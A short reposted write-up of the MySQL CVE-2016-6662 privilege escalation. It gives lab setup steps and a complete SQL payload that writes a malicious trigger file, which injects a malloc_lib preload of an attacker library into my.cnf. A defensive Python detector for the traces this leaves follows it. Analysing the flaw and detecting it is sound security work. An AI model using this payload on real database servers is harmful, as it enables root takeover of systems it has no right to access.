CVE-2016-6662 MySQL privilege escalation analysis
MySQL <= 5.7.15, 5.6.33, 5.5.52 Remote Code Execution / Privilege Escalation (0day). MySQL branches are also affected, including MariaDB and PerconaDB.
Create a user Bob and grant it the FILE, SELECT and INSERT privileges, then create the database Activedb and the table active_table for the experiment.
The exploit is written to the /tmp directory and compiled into a .so file; the IP, port and my.cnf location in it need to be modified.
Select "Type=triggers\ntriggers='CREATE definer='root'@'localhost' TRIGGER active_table\nafter insert\n on 'Active_table' For each row\nbegin\n DECLARE void varchar(550);\n set global general_log_file=\\\'/etc/mysql/my.cnf\\\';\n set global general_log = on;\n select \"\n[mysqld]\nmalloc_lib=\\\'/tmp/mysql_hookandroot_lib.so\\\'\n\' into void;\n Set global general_log = Off;\nend'\nsql_modes=1073741824\ndefiners='[email protected]'\nclient_cs_names='Latin1'\nconnection_cl_names='latin1_swedish_ci'\ndb_cl_names='latin1_swedish_ci'" into DumpFile '/var/lib/mysql/Activedb/active_table.TRG';
I found that a writable my.cnf will be ignored??? I don't know why (was it patched?), and I don't know what the situation will be on 5.5, so first change the permissions of my.cnf back to 744.
Article reposted from: http://blog.0kami.cn/2016/09/18/cve-2016-6663-mysql-exp/
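A defensive check for the traces this technique leaves, as an added example (not code from the original article): it flags preload directives and non-config lines in the text of a my.cnf, trigger definitions that touch the general-log settings, and config files that are writable or not root-owned. The function names and sample inputs are constructed for illustration, and the root-ownership rule is an assumption about how the host should be configured.

```python
import re
import stat

SECTION = re.compile(r"^\[([^\]]+)\]$")
SETTING = re.compile(r"^([A-Za-z0-9_-]+)\s*(=.*)?$")
PRELOAD = {"malloc_lib", "malloc-lib"}  # the page uses malloc_lib; dash form checked too

def audit_cnf(text):
    """Return (line_no, reason) findings for the text of a my.cnf file."""
    findings, section = [], None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;" or line.startswith("!include"):
            continue
        m = SECTION.match(line)
        if m:
            section = m.group(1).lower()
            continue
        m = SETTING.match(line)
        if not m:
            # Query-log records appended to the file do not parse as settings.
            findings.append((no, "not a config line (possible log output)"))
        elif m.group(1).lower() in PRELOAD and section in ("mysqld", "mysqld_safe"):
            findings.append((no, "library preload directive"))
    return findings

def audit_trg(text):
    """True if a .TRG trigger definition touches the general-log settings."""
    return re.search(r"general_log(_file)?\b", text, re.I) is not None

def risky_mode(mode, owner_uid):
    """True if group/world-writable or not root-owned (assumed policy)."""
    return owner_uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

# Constructed sample: a config file after log lines were appended to it.
SAMPLE_CNF = """[mysqld]
datadir = /var/lib/mysql
/usr/sbin/mysqld, Version: 5.5.50 started with:
Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock
[mysqld]
malloc_lib='/tmp/mysql_hookandroot_lib.so'
"""
SAMPLE_TRG = "set global general_log_file='/etc/mysql/my.cnf';"  # from the page's trigger

if __name__ == "__main__":
    for no, reason in audit_cnf(SAMPLE_CNF):
        print(f"my.cnf line {no}: {reason}")
    print("trigger touches general log:", audit_trg(SAMPLE_TRG))
    print("mode 0o744, uid 0 risky:", risky_mode(0o744, 0))
```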